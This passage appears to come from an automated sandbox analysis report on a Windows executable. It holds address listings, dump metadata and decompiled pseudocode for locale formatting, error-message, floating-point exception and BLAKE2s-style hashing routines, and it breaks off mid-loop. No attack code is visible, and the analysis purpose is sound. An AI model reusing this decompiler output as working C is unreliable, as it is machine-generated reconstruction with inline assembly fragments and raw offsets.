          0x0021c18f
          0x0021c195
          0x0021c195
          0x0021c196
          0x0021c199
          0x0021c1a0
          0x0021c1a9
          0x0021c1ae
          0x0021c1b1
          0x0021c1b6
          0x0021c1b9
          0x0021c1bb
          0x0021c1c0
          0x0021c1c3
          0x0021c1c6
          0x0021c1c6
          0x0021c1c6
          0x0021c1ca
          0x0021c1cd
          0x0021c1cd
          0x0021c1d2
          0x0021c1d2
          0x0021c1dd
          0x0021c1e8
          0x0021c1e8
          0x0021c1eb
          0x0021c1f7
          0x0021c1fc
          0x0021c207
          0x0021c209
          0x0021c20b
          0x0021c211
          0x0021c216
          0x0021c218
          0x0021c21e
          0x0021c130
          0x0021c13c
          0x0021c13c
          0x0021c13f
          0x0021c14f
          0x0021c155
          0x0021c15c
          0x0021c15e
          0x0021c166
          0x0021c168
          0x0021c16a
          0x0021c16f
          0x0021c172
          0x0021c178
          0x0021c178
          0x0021c0fd
          0x0021c100
          0x0021c104
          0x0021c10a
          0x0021c119
          0x0021c123
          0x0021c12b
          0x0021c12b
          0x0021c0fb
          0x0021c0d6
          0x0021c0d9
          0x0021c0df
          0x0021c0df
          0x0021c0c5
          0x0021c0cb
          0x0021c0cb

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 0e50bbf9e4776493f77c5540494787f02e85b2eba5f0c0a8ffb8a0a8bb63874f
          • Instruction ID: 70962bd49a16e39642a822b7e8f7a694e81cb6942fa7834d4b39c799ec6b5d09
          • Opcode Fuzzy Hash: 0e50bbf9e4776493f77c5540494787f02e85b2eba5f0c0a8ffb8a0a8bb63874f
          • Instruction Fuzzy Hash: FB025C75E5021A9BDF14CFA9C8806EDB7F1FF98324F25816AD819E7380D731AA51CB90
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00209D99, Relevance: 3.0, APIs: 2, Instructions: 46COMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E00209D99(intOrPtr _a4, intOrPtr _a8, short* _a12, int _a16) {
				short _v104;
				short _v304;
				short* _t23;
				int _t24;

				if( *0x22d610 == 0) {
					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
					 *0x24de30 = _v304;
					 *0x24de32 = 0;
					 *0x22d610 = 0x24de30;
				}
				E001FF980(_a4, _a8,  &_v104, 0x32);
				_t23 = _a12;
				_t24 = _a16;
				 *_t23 = 0;
				GetNumberFormatW(0x400, 0,  &_v104, 0x22d600, _t23, _t24);
				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
				return 0;
			}







          0x00209db1
          0x00209dbf
          0x00209dcc
          0x00209dd4
          0x00209dda
          0x00209dda
          0x00209df0
          0x00209df5
          0x00209dfa
          0x00209e04
          0x00209e0e
          0x00209e16
          0x00209e21

          APIs
          • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00209DBF
          • GetNumberFormatW.KERNEL32 ref: 00209E0E
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: FormatInfoLocaleNumber
          • String ID:
          • API String ID: 2169056816-0
          • Opcode ID: 6dd8276a4f2bf9f801de478e058c385778fe187f5409fed41945c1cecdd18e76
          • Instruction ID: 3c772e596bc2539a5bcc86e8946edc47d77190fbcb4cc5748c24f75f1193ed97
          • Opcode Fuzzy Hash: 6dd8276a4f2bf9f801de478e058c385778fe187f5409fed41945c1cecdd18e76
          • Instruction Fuzzy Hash: E2015E35610208BBD7209FA4EC49FAB77BCEF19710F505422FA08A72A1D3B1992587A5
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F6D06, Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
          Download Yara Rule
          C-Code - Quality: 79%
          			E001F6D06(WCHAR* _a4, long _a8) {
				long _t3;
				signed int _t5;

				_t3 = GetLastError();
				if(_t3 == 0) {
					return 0;
				}
				_t5 = FormatMessageW(0x1200, 0, _t3, 0x400, _a4, _a8, 0);
				asm("sbb eax, eax");
				return  ~( ~_t5);
			}





          0x001f6d06
          0x001f6d0e
          0x00000000
          0x001f6d35
          0x001f6d27
          0x001f6d2f
          0x00000000

          APIs
          • GetLastError.KERNEL32(00200DE0,?,00000200), ref: 001F6D06
          • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 001F6D27
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ErrorFormatLastMessage
          • String ID:
          • API String ID: 3479602957-0
          • Opcode ID: ec5c41134b932727300844a261f42f859c1f7c8502ffa87c553b366e7ebb9834
          • Instruction ID: 1684da6be331632bea7aef8f92236d9a1a51fbfdf81e118dbda792c18e0fa64f
          • Opcode Fuzzy Hash: ec5c41134b932727300844a261f42f859c1f7c8502ffa87c553b366e7ebb9834
          • Instruction Fuzzy Hash: 57D0C97138830ABEFA210AB09C0AF3A7795B765B82F209904B396E90E0D6719119D629
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00220654, Relevance: 1.8, APIs: 1, Instructions: 269COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 100%
          			E00220654(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E0021DFB6(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E0021DF1C(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}























          0x00220662
          0x00220669
          0x0022066e
          0x00220674
          0x00220677
          0x0022067d
          0x00220682
          0x00220687
          0x00220687
          0x0022068d
          0x00220692
          0x00220697
          0x00220697
          0x0022069e
          0x002206a3
          0x002206a8
          0x002206a8
          0x002206af
          0x002206b4
          0x002206b9
          0x002206b9
          0x002206c0
          0x002206c5
          0x002206ca
          0x002206ca
          0x002206d2
          0x002206e2
          0x002206f4
          0x00220706
          0x00220719
          0x0022072b
          0x00220733
          0x00220738
          0x0022073d
          0x0022073d
          0x00220744
          0x00220749
          0x00220749
          0x00220750
          0x00220755
          0x00220755
          0x0022075c
          0x00220761
          0x00220761
          0x00220768
          0x0022076d
          0x0022076d
          0x00220777
          0x00220779
          0x002207b3
          0x0022077b
          0x00220780
          0x002207a4
          0x002207ac
          0x002207a0
          0x002207a0
          0x002207b6
          0x002207bd
          0x002207bf
          0x002207e1
          0x002207e9
          0x002207ec
          0x002207ec
          0x002207ee
          0x002207ee
          0x002207f9
          0x002207ff
          0x00220804
          0x0022080b
          0x00220845
          0x00220850
          0x00220856
          0x00220859
          0x0022085c
          0x00220868
          0x00220870
          0x0022080d
          0x00220810
          0x0022081c
          0x00220822
          0x00220828
          0x0022082b
          0x00220834
          0x00220834
          0x00220873
          0x00220881
          0x00220887
          0x0022088e
          0x00220890
          0x00220890
          0x00220897
          0x00220899
          0x00220899
          0x002208a0
          0x002208a2
          0x002208a2
          0x002208a9
          0x002208ab
          0x002208ab
          0x002208b2
          0x002208b4
          0x002208b4
          0x002208c1
          0x002208c4
          0x002208fb
          0x002208c6
          0x002208c6
          0x002208c9
          0x002208f4
          0x002208e9
          0x002208e9
          0x002208fd
          0x00220905
          0x00220908
          0x00220927
          0x0022092c
          0x0022092c
          0x0022092e
          0x00220933
          0x0022093f
          0x00220935
          0x00220938
          0x00220938
          0x00220944
          0x00220944
          0x0022090a
          0x0022090d
          0x0022091c
          0x00000000
          0x0022091c
          0x0022090f
          0x00220912
          0x00220914
          0x00220914
          0x00000000
          0x00220912
          0x002208cb
          0x002208ce
          0x002208e4
          0x00000000
          0x002208e4
          0x002208d3
          0x002208d5
          0x002208d5
          0x002208d3
          0x00000000
          0x002208c4
          0x002207c6
          0x002207d4
          0x002207dc
          0x00000000
          0x002207dc
          0x002207ca
          0x002207cf
          0x002207cf
          0x00000000
          0x002207ca
          0x00220787
          0x00220795
          0x0022079d
          0x00000000
          0x0022079d
          0x0022078b
          0x00220790
          0x00220790
          0x0022078b

          APIs
          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0022064F,?,?,00000008,?,?,002202EF,00000000), ref: 00220881
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ExceptionRaise
          • String ID:
          • API String ID: 3997070919-0
          • Opcode ID: afa3f8451d09a94e9895c0639fd33096b4c7102257805bb048237ae77cc5ca72
          • Instruction ID: b57f862bb6e58c15f68c825049d2f201e7f4d344bcfab095daaf64eec25fb949
          • Opcode Fuzzy Hash: afa3f8451d09a94e9895c0639fd33096b4c7102257805bb048237ae77cc5ca72
          • Instruction Fuzzy Hash: 8AB17C35520619EFD714CF68D4CAB657BE0FF44324F258658E89ACF2A2C335E9A1CB40
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F3EAD, Relevance: 1.6, Strings: 1, Instructions: 332COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 81%
          			E001F3EAD() {
				void* _t230;
				signed int* _t231;
				intOrPtr _t240;
				signed int _t245;
				intOrPtr _t246;
				signed int _t257;
				intOrPtr _t258;
				signed int _t269;
				intOrPtr _t270;
				signed int _t275;
				signed int _t280;
				signed int _t285;
				signed int _t290;
				signed int _t295;
				intOrPtr _t296;
				signed int _t301;
				intOrPtr _t302;
				signed int _t307;
				intOrPtr _t308;
				signed int _t313;
				intOrPtr _t314;
				signed int _t319;
				signed int _t324;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t348;
				signed int _t350;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t368;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t374;
				signed int _t375;
				intOrPtr _t376;
				intOrPtr _t377;
				signed int _t379;
				signed int _t381;
				intOrPtr _t383;
				signed int _t385;
				signed int _t386;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				intOrPtr _t396;
				signed int _t398;
				intOrPtr _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				signed int _t414;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				intOrPtr _t431;
				signed int _t433;
				intOrPtr _t434;
				void* _t435;
				void* _t436;
				void* _t437;

				_t377 =  *((intOrPtr*)(_t435 + 0xc0));
				_t342 = 0x10;
				 *((intOrPtr*)(_t435 + 0x18)) = 0x3c6ef372;
				memcpy(_t435 + 0x8c,  *(_t435 + 0xd0), _t342 << 2);
				_t436 = _t435 + 0xc;
				_push(8);
				_t230 = memcpy(_t436 + 0x4c,  *(_t377 + 0xf4), 0 << 2);
				_t437 = _t436 + 0xc;
				_t418 =  *_t230 ^ 0x510e527f;
				_t231 =  *(_t377 + 0xfc);
				_t407 =  *(_t230 + 4) ^ 0x9b05688c;
				_t334 =  *(_t437 + 0x64);
				 *(_t437 + 0x28) = 0x6a09e667;
				 *(_t437 + 0x30) = 0xbb67ae85;
				_t379 =  *_t231 ^ 0x1f83d9ab;
				_t348 =  *(_t437 + 0x5c);
				 *(_t437 + 0x44) = _t231[1] ^ 0x5be0cd19;
				 *(_t437 + 0x3c) =  *(_t437 + 0x68);
				 *(_t437 + 0x1c) =  *(_t437 + 0x60);
				 *(_t437 + 0x2c) =  *(_t437 + 0x58);
				 *(_t437 + 0x38) =  *(_t437 + 0x54);
				 *(_t437 + 0x20) =  *(_t437 + 0x50);
				 *((intOrPtr*)(_t437 + 0x10)) = 0;
				 *((intOrPtr*)(_t437 + 0x48)) = 0;
				_t427 =  *(_t437 + 0x44);
				 *(_t437 + 0x14) =  *(_t437 + 0x4c);
				_t240 =  *((intOrPtr*)(_t437 + 0x10));
				 *(_t437 + 0x24) = 0xa54ff53a;
				 *(_t437 + 0x40) = _t334;
				 *(_t437 + 0x34) = _t348;
				do {
					_t37 = _t240 + 0x2223b0; // 0x3020100
					_t350 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t37 & 0x000000ff) * 4)) + _t348;
					 *(_t437 + 0x14) = _t350;
					_t351 = _t350 ^ _t418;
					asm("rol ecx, 0x10");
					_t245 =  *(_t437 + 0x28) + _t351;
					_t420 =  *(_t437 + 0x34) ^ _t245;
					 *(_t437 + 0x28) = _t245;
					_t246 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror esi, 0xc");
					 *(_t437 + 0x34) = _t420;
					_t48 = _t246 + 0x2223b1; // 0x4030201
					_t422 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t48 & 0x000000ff) * 4)) + _t420;
					 *(_t437 + 0x14) = _t422;
					_t423 = _t422 ^ _t351;
					asm("ror esi, 0x8");
					_t353 =  *(_t437 + 0x28) + _t423;
					 *(_t437 + 0x28) = _t353;
					asm("ror eax, 0x7");
					 *(_t437 + 0x34) =  *(_t437 + 0x34) ^ _t353;
					_t60 =  *((intOrPtr*)(_t437 + 0x10)) + 0x2223b2; // 0x5040302
					_t355 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t60 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x20) = _t355;
					_t356 = _t355 ^ _t407;
					asm("rol ecx, 0x10");
					_t257 =  *(_t437 + 0x30) + _t356;
					_t409 =  *(_t437 + 0x1c) ^ _t257;
					 *(_t437 + 0x30) = _t257;
					_t258 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edi, 0xc");
					 *(_t437 + 0x1c) = _t409;
					_t71 = _t258 + 0x2223b3; // 0x6050403
					_t411 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t71 & 0x000000ff) * 4)) + _t409;
					 *(_t437 + 0x20) = _t411;
					_t412 = _t411 ^ _t356;
					asm("ror edi, 0x8");
					_t358 =  *(_t437 + 0x30) + _t412;
					 *(_t437 + 0x30) = _t358;
					asm("ror eax, 0x7");
					 *(_t437 + 0x1c) =  *(_t437 + 0x1c) ^ _t358;
					_t82 =  *((intOrPtr*)(_t437 + 0x10)) + 0x2223b4; // 0x7060504
					_t336 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t82 & 0x000000ff) * 4)) + _t334;
					_t360 = _t336 ^ _t379;
					asm("rol ecx, 0x10");
					_t269 =  *(_t437 + 0x18) + _t360;
					_t381 =  *(_t437 + 0x40) ^ _t269;
					 *(_t437 + 0x18) = _t269;
					_t270 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t91 = _t270 + 0x2223b5; // 0x8070605
					_t337 = _t336 +  *((intOrPtr*)(_t437 + 0x8c + ( *_t91 & 0x000000ff) * 4)) + _t381;
					 *(_t437 + 0x38) = _t337;
					_t338 = _t337 ^ _t360;
					asm("ror ebx, 0x8");
					_t275 =  *(_t437 + 0x18) + _t338;
					 *(_t437 + 0x18) = _t275;
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t381 ^ _t275;
					_t383 =  *((intOrPtr*)(_t437 + 0x10));
					_t101 = _t383 + 0x2223b6; // 0x9080706
					_t362 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t101 & 0x000000ff) * 4)) +  *(_t437 + 0x3c);
					 *(_t437 + 0x2c) = _t362;
					_t363 = _t362 ^ _t427;
					asm("rol ecx, 0x10");
					_t280 =  *(_t437 + 0x24) + _t363;
					_t429 =  *(_t437 + 0x3c) ^ _t280;
					 *(_t437 + 0x24) = _t280;
					_t110 = _t383 + 0x2223b7; // 0xa090807
					asm("ror ebp, 0xc");
					_t385 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t110 & 0x000000ff) * 4)) + _t429;
					 *(_t437 + 0x2c) = _t385;
					_t386 = _t385 ^ _t363;
					asm("ror edx, 0x8");
					_t285 =  *(_t437 + 0x24) + _t386;
					 *(_t437 + 0x24) = _t285;
					asm("ror ebp, 0x7");
					 *(_t437 + 0x3c) = _t429 ^ _t285;
					_t431 =  *((intOrPtr*)(_t437 + 0x10));
					_t121 = _t431 + 0x2223b8; // 0xb0a0908
					_t365 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t121 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x14) = _t365;
					_t366 = _t365 ^ _t386;
					asm("rol ecx, 0x10");
					_t290 =  *(_t437 + 0x18) + _t366;
					_t388 =  *(_t437 + 0x1c) ^ _t290;
					 *(_t437 + 0x18) = _t290;
					_t130 = _t431 + 0x2223b9; // 0xc0b0a09
					asm("ror edx, 0xc");
					_t433 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t130 & 0x000000ff) * 4)) + _t388;
					 *(_t437 + 0x14) = _t433;
					 *(_t437 + 0x4c) = _t433;
					_t427 = _t433 ^ _t366;
					asm("ror ebp, 0x8");
					_t295 =  *(_t437 + 0x18) + _t427;
					_t389 = _t388 ^ _t295;
					 *(_t437 + 0x18) = _t295;
					 *(_t437 + 0x74) = _t295;
					_t296 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x1c) = _t389;
					 *(_t437 + 0x60) = _t389;
					_t144 = _t296 + 0x2223ba; // 0xd0c0b0a
					_t390 =  *(_t437 + 0x40);
					_t368 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t144 & 0x000000ff) * 4)) + _t390;
					 *(_t437 + 0x20) = _t368;
					_t369 = _t368 ^ _t423;
					asm("rol ecx, 0x10");
					_t301 =  *(_t437 + 0x24) + _t369;
					_t391 = _t390 ^ _t301;
					 *(_t437 + 0x24) = _t301;
					_t302 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t154 = _t302 + 0x2223bb; // 0xe0d0c0b
					_t425 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t154 & 0x000000ff) * 4)) + _t391;
					 *(_t437 + 0x20) = _t425;
					 *(_t437 + 0x50) = _t425;
					_t418 = _t425 ^ _t369;
					asm("ror esi, 0x8");
					_t307 =  *(_t437 + 0x24) + _t418;
					_t392 = _t391 ^ _t307;
					 *(_t437 + 0x24) = _t307;
					 *(_t437 + 0x78) = _t307;
					_t308 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t392;
					 *(_t437 + 0x64) = _t392;
					_t167 = _t308 + 0x2223bc; // 0xf0e0d0c
					_t393 =  *(_t437 + 0x3c);
					_t371 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t167 & 0x000000ff) * 4)) + _t393;
					 *(_t437 + 0x38) = _t371;
					_t372 = _t371 ^ _t412;
					asm("rol ecx, 0x10");
					_t313 =  *(_t437 + 0x28) + _t372;
					_t394 = _t393 ^ _t313;
					 *(_t437 + 0x28) = _t313;
					_t314 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t177 = _t314 + 0x2223bd; // 0xe0f0e0d
					_t414 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t177 & 0x000000ff) * 4)) + _t394;
					 *(_t437 + 0x38) = _t414;
					 *(_t437 + 0x54) = _t414;
					_t407 = _t414 ^ _t372;
					asm("ror edi, 0x8");
					_t319 =  *(_t437 + 0x28) + _t407;
					_t395 = _t394 ^ _t319;
					 *(_t437 + 0x28) = _t319;
					asm("ror edx, 0x7");
					 *(_t437 + 0x3c) = _t395;
					 *(_t437 + 0x68) = _t395;
					_t396 =  *((intOrPtr*)(_t437 + 0x10));
					 *(_t437 + 0x6c) = _t319;
					_t190 = _t396 + 0x2223be; // 0xa0e0f0e
					_t374 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t190 & 0x000000ff) * 4)) +  *(_t437 + 0x34);
					 *(_t437 + 0x2c) = _t374;
					_t375 = _t374 ^ _t338;
					asm("rol ecx, 0x10");
					_t324 =  *(_t437 + 0x30) + _t375;
					_t340 =  *(_t437 + 0x34) ^ _t324;
					 *(_t437 + 0x30) = _t324;
					_t199 = _t396 + 0x2223bf; // 0x40a0e0f
					asm("ror ebx, 0xc");
					_t398 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t199 & 0x000000ff) * 4)) + _t340;
					 *(_t437 + 0x2c) = _t398;
					 *(_t437 + 0x58) = _t398;
					_t379 = _t398 ^ _t375;
					asm("ror edx, 0x8");
					_t329 =  *(_t437 + 0x30) + _t379;
					_t341 = _t340 ^ _t329;
					 *(_t437 + 0x30) = _t329;
					 *(_t437 + 0x70) = _t329;
					asm("ror ebx, 0x7");
					_t240 =  *((intOrPtr*)(_t437 + 0x10)) + 0x10;
					 *(_t437 + 0x34) = _t341;
					_t348 =  *(_t437 + 0x34);
					 *(_t437 + 0x5c) = _t341;
					_t334 =  *(_t437 + 0x40);
					 *((intOrPtr*)(_t437 + 0x10)) = _t240;
				} while (_t240 <= 0x90);
				 *(_t437 + 0x84) = _t379;
